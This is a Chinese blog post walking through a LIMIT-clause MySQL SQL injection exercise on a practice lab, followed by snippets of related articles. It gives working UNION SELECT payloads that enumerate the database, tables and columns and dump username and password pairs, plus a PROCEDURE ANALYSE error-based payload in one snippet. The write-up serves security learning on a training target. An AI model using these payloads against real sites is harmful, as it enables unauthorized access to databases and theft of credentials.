五号黯区靶场 mysql 注入之limit注入记录

最新推荐文章于 2024-05-27 07:59:10 发布
最新推荐文章于 2024-05-27 07:59:10 发布
阅读量922 收藏 1
点赞数
分类专栏: web安全 文章标签: mysql 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/125908701
版权

前言

感谢五号黯区团队。
limit 功能 通常在分页处
比如page 字段 可能存在

limit注入(不存在order by)

http://bug.cc:86/limit/limit.php?p=1
访问靶场如下图
在这里插入图片描述

原数据库语句如下

select * from users where id <= 100 limit $p,1

p为传参点

1.1 当p 为1时 sql语句和回显为

select * from users where id <= 100 limit 1,1

id:2 username:Angelina password:I-kill-you

1.2 测试是否存在sql注入

payload:输入2 --+

select * from users where id <= 100 limit 2 -- ,1

id:1 username:Dumb password:Dumb
id:2 username:Angelina password:I-kill-you

如上 注释掉了 后边的,- 查询出两条数据
sql语句 执行成功 说明存在sql注入

1.3 测试回显位(limit注入后不能用order by 判断列数 )

payload:1,0 union select 1,2,3 --+

select * from users where id <= 100 limit 1,0 union select 1,2,3 – ,1

id:1 username:2 password:3

1.4 爆数据

select * from users where id <= 100 limit 1,0 union select 1,2,database() -- ,1

id:1 username:2 password:security 


select * from users where id <= 100 limit 1,0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- ,1

id:1 username:2 password:emails,referers,uagents,users

字段(两个语句锁定这个表)

select * from users where id <= 100 limit 1,0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database() -- ,1

id:1 username:2 password:id,username,password

字段值

select * from users where id <= 100 limit 1,0 union select 1,2,group_concat(username,0x7e,password) from security.users -- ,1

id:1 username:2 password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4

1.5 总结

回显 传入 2–+ 测试 就可以显示出3个字段

后续测法就和正常union 联合一样 但是不能用order by 判断数据列数

LuckyCharm~
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mysql+limit+sql注入_sql注入limit注入和五种时间盲注姿势
weixin_28803437的博客
01-19 619
0x00前言limit注入和时间前面也提过一点点了,真的非常简单,真不太想单独写一个这个来水博客。。这里还是记录一下吧以后忘了方便复习。0x01 limit基础知识照抄前面的:这里简单记录一下我自己经常会忘的知识点,觉得不值得再写一篇博客去水了233使用查询语句的时候,经常要使用limit返回前几条或者中间某几行数据SELECT*FROMtableLIMIT[offset,]rows...
mysql注入limit 注入
Sp4rkW的博客
03-05 4251
limit注入基本常见的分两种场景,存在`order by`与否,本文将复现尝试各种limit注入的姿势与讨论不同mysql版本对注入payload的影响。作者能力有限,有更多思路欢迎讨论~
MysqlLimit注入方法(此方法仅适用于5.0.0<mysql<5.6.6的版本)
最新发布
余十步的博客
05-27 613
问题的关键在于,语句中有 order by 关键字,mysql 中在 order by 前面可以使用 union 关键字,所以如果注入点前面没有 order by 关键字,就可以使用 union 关键字,但是现在的情况是,注入点前面有 order by 关键字。在LIMIT后面可以跟两个函数,PROCEDURE 和 INTO,INTO除非有写入shell的权限,否则是无法利用的,这里的重点是 PROCEDURE 关键字.MySQL默认可用的存储过程只有 ANALYSE。得到表名:article,user。
mysqllimit注入
cherrie007的博客
07-27 4521
[转载]MysqlLimit注入方法
MysqlLimit注入方法(此方法仅适用于5.0.0<mysql<5.6.6的版本)
weixin_34115824的博客
07-27 189
SQL语句类似下面这样:(此方法仅适用于5.0.0<mysql<5.6.6的版本) SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT注入点) 问题的关键在于,语句中有 order by 关键字,mysql 中在 order by 前面可以使用 union 关键字,所以如果注入点前面没有 order b...
mysql limit 注入_[转载]MysqlLimit注入方法
weixin_30394975的博客
01-26 364
欢迎来到阿八个人博客网站。本阿八个人博客网站提供最新的站长新闻,各种互联网资讯。喜欢本站的朋友可以收藏本站,或者加QQ:我们大家一起来交流技术!URL链接:https://www.abboke.com/rz/2019/1010/116748.html很长一段时间我、以及很多同学认为“mysql limit后的注入点”是没办法解决的难题,但这次真的被解决了。我很少转载文章,这次再破个例。原文:ht...
PHP+MYSQL 注入靶场
04-26
**PHP+MYSQL 注入靶场**是一个用于学习和实践**SQL注入**的平台,它包含相关的源代码,有助于用户深入理解漏洞的原理。通过这个靶场,你可以模拟真实环境下的安全测试,提升对SQL注入攻击的防御能力。下面将详细阐述...
mysql注入-sqlilabs靶场注入
10-15
本教程基于SQLiLabs靶场,将深入探讨MySQL注入的各种技术和防御策略。 SQLiLabs是专门为学习和实践SQL注入技能设计的一个在线平台,它包含了多个级别,每个级别代表一个特定的注入场景,逐步提高难度。通过完成这些...
pikachu靶场SQL注入.docx
09-13
MYSQL5.0以下版本中,注入属于暴力猜解,而在MYSQL5以上版本中,注入属于有根据猜解。我们可以借助信息模式(information_schema)来获取指定数据库下的表名或列名信息,从而实现有根据查询。 三、字符型注入...
sql注入靶场.zip
06-24
这个"sql注入靶场.zip"文件包含了一个名为"sqli-labs-master"的靶场,旨在帮助学习者了解、实践和防御SQL注入攻击。靶场通常由一系列逐步增加难度的挑战组成,让学习者通过实际操作来提升自己的安全技能。 靶场的...
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
mysql limit后的注入
ztaos的博客
12-04 626
mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1); 例子:http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&num=1    procedure
mysql+limit+sql注入_Sql注入limit注入的学习
weixin_33110431的博客
01-19 140
0x01 前言今天听学长们交流漏洞挖掘的经验,提到了Limit注入,借此来学习一下limit注入0x02 知识介绍limitLIMIT[位置偏移量,]行数其中,中括里面的参数是可选参数,位置偏移量是指MySQL查询分析器要从哪一行开始显示,索引值从0开始,即第一条记录位置偏移量是0,第二条记录的位置偏移量是1,依此类推...,第二个参数为“行数”即指示返回的记录条数。效果如图 自行理解bench...
SQL注入之order by注入limit注入
m0_46467017的博客
08-09 4529
MySQL支持使用ORDER BY语句对查询结果集进行排序处理,使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。语法格式如下select * from 表名 order by 列名(或者数字) asc;升序(默认升序) select * from 表名 order by 列名(或者数字) desc;降序假设有以下用户表当我们使用命令的时候,是将users这张表按照username这一列进行升序,结果就变成了;...
mysql注入-orderby之后limit位置
HRay's blog
07-20 2465
今天遇到的,记录下,如下位置产生sql注入 select xxx from x order by xx limit {sql} 花括位置为可控的点,支持报错的话可以利用如下语句获取内容 http://test.com/test.php?id=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)%23 不支持报
Mysql注入点在limit关键字后面的利用方法
m0_46315342的博客
07-23 770
遇到一个这样贱贱的题目: 小明经过学习,终于对SQL注入有了理解,她知道原来sql注入的发生根本原因还是数据和语句不能正确分离的原因,导致数据作为sql语句执行;但是是不是只要能够控制sql语句的一部分就能够来利用获取数据呢?小明经过思考知道,where条件可控的情况下,实在是太容易了,但是如果是在limit条件呢? 所以就写一篇博客记录一下 先看看 mysql 5.x 的文档中的 select 的语法: SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORI
sql-lab关于limit注入(网络信息安全实验室 第四题)
weixin_43803070的博客
04-27 1970
关于limit注入(记一次sql注入) 1.函数解释 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML() 1)extractvalue():从目标XML中返回包含所查询值的字符串。   EXTRACTVALUE (XML_document, XPath_string);   第一个参数:XML_document是Str...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值